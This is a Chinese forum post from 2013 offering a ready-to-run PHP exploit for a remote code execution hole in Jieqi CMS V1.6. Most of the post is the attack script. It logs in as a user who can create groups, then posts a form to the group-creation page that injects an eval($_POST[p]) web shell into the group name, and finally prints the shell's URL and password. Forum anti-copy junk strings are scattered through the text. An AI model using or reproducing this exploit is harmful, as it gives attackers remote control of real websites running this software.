找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2211|回复: 0
打印 上一主题 下一主题

Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:28:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。7 m+ a, n$ b0 `! ?, e

- `0 c; D3 s7 K  u; I & H( c" ~1 A+ S! K! X
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。* I& n  N" w/ @
需要有一个能创建圈子的用户。
6 ], e8 Q) R2 P& l
5 t+ X/ _' `/ K: @4 a<?php* n+ @5 q. g2 |7 K& ^/ H  a# T
& Y$ N* k% H1 G  j" z# C7 c
print_r(': V: v3 x3 G/ l) [
+---------------------------------------------------------------------------+5 X9 p- o: M, ?6 n9 U8 j
Jieqi CMS V1.6 PHP Code Injection Exploit
- l( s9 p% q" Y3 M0 Dby flyh4t# p7 }6 O0 C" ]/ T
mail: phpsec at hotmail dot com
3 r4 y1 T- _0 [$ uteam: http://www.wolvez.org' v, A; G6 g" I- N7 Y5 ]) S) l
+---------------------------------------------------------------------------+6 l! l) F$ N) T; c7 L
'); /**
/ l1 F8 W, O3 U6 Y5 X* L8 \% X * works regardless of php.ini settings: L6 F. O0 p4 j- V
*/ if ($argc < 5) { print_r('
7 s; @  Z- x5 |; [8 S6 Z+ _- o+---------------------------------------------------------------------------+
. e- k  ]7 |& qUsage: php '.$argv[0].' host path username
' Z( `& V/ L% O9 Phost:      target server (ip/hostname)6 d& v* F# d) o/ {% [& F
path:      path to jieqicms
3 J! R9 y4 t4 w% q! B7 L! T  Muasename:  a username who can create group
# c2 N! z0 m0 ]9 ~5 g* F7 r) YExample:9 v/ p  c+ V- P+ j% J3 d( ^" b+ Q
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password8 _1 U+ t- G4 c
+---------------------------------------------------------------------------+
; U5 J* ~- H- t* O6 V'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
) m1 \% x7 t7 k* c1 nContent-Disposition: form-data; name="gname"1 V. f. N& Z' L# {9 u+ Z( c0 _

5 W0 ?& W9 j* Q0 F( C2 ['; $params .="';"; $params .='eval($_POST[p]);//flyh4t
6 I& Y' u- [1 Y: x- k; x-----------------------------23281168279961* F- `$ C4 p  B6 M! `/ w6 b
Content-Disposition: form-data; name="gcatid"1 V: O2 r- \- W- p+ Q! Q9 N
% I" B9 k; h0 z) A9 a" q
10 j% Y& ~! P2 M4 z! K8 ?, R
-----------------------------232811682799619 t6 \: R$ D, k/ s$ x/ {
Content-Disposition: form-data; name="gaudit"
* D2 g9 a$ N' z/ m $ s9 H, V6 {* r- r
1. D" E4 Q; L% E5 r, e7 R
-----------------------------23281168279961
3 j% _: ]& Z& C! }0 v4 KContent-Disposition: form-data; name="gbrief"
2 x: W8 u! M) g# s5 a  o4 }
: q; B- m- }& s$ m/ h0 |1
  E3 U4 ~& l+ z4 j! V-----------------------------23281168279961--
' J- ?1 ?/ j& a& ~2 u: h2 _'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com" U8 e: I7 ~' ]4 g; T7 ]7 h
% f% X# B  q6 J1 X7 W! |% a
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表